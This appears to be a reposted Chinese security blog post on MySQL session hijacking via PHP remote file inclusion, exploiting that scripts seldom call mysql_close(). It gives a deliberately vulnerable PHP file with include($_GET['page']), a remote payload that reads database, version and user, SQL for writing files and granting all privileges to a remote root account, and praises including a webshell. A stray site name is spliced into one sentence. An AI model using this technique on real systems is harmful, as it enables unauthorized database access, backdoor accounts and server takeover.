这是mysql_close 函数功能造成的
引用:
mysql_close() closes the non-persistent connection to the MySQL server that’s associated with the specified link identifier. If link_identifier isn’t specified, the last opened link is used.
Using mysql_close() isn’t usually necessary, as non-persistent open links are automatically closed at the end of the script’s execution. See also freeing resources.
通常不需要使用mysql_close(),因为已打开的非持久连接会在脚本执行完毕后自动关闭。
测试一下:mysql.php
<?php
$host = "localhost";
$user = "root";
$pass = "rootpass";
$db = "test";
// Current
$connect = mysql_connect($host,$user,$pass);
mysql_select_db($db,$connect);
$query = mysql_query("SELECT uname FROM admin");
while($lol = mysql_fetch_array($query)){
echo "we get it: ".$lol["uname"]."<br>";
}
include($_GET["page"]); // SCRIPT HAVE RFI
?>本地:
<?php
$evil = mysql_query("SELECT concat_ws(0x3a,database(),version(),user());");
$a = mysql_fetch_array($evil);
echo $a[0];
?>当我们提交URL 发现本地的代码被远程主机执行了
在程序员写代码的时候,总喜欢吧连接数据库的文件单独,并且在其他文件涉及的时候包含他,例如 include(“dbtabase.php”);
如果在渗透测试中发现一个PHP包含,并且include了数据库,我们就能操作他的数据库,或许可以做点其他事情 例如:SELECT ‘Hello World’INTO DUMPFILE ‘/tmp/test.txt’,www.xuhantao.com,涛涛电脑知识网,
或者:GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’IDENTIFIED BY ‘pass’WITH GRANT OPTION;
当然直接包含个Webshell爽多了
参考:
MySQL Session Hijacking over RFI